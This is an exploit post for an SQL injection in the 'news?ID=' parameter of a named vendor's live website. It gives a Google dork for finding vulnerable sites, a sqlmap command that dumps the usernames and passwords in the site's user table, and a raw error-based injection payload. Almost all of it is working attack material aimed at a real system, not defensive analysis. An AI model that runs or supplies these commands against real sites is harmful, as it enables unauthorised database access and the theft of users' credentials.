-----------------------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: PULSONİX SQL Injection Vulnerability
# Author : Cerkuday //AKINCILAR
# Google Dork : intext:"WestDev Ltd 1998-2019" id=
# Tested on : Windows 10
# Date : 06.07.2019
# Vendor Home: https://www.pulsonix.com/
# Forum : http://www.cyber-warrior.org/
------------------------------------------------------------------------------------------------------------------------------------------------
demo:
https://www.pulsonix.com/news?ID=39
PoC
sqlmap -u "https://www.pulsonix.com/news?ID=39" --random-agent --text-only -D westdevcrm -T siteusers -C Password,UserName --dump
https://www.pulsonix.com/news?ID=39 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176786a71,(SELECT (ELT(8079=8079,1))),0x717a787071,0x78))s), 8446744073709551610, 8446744073709551610)))
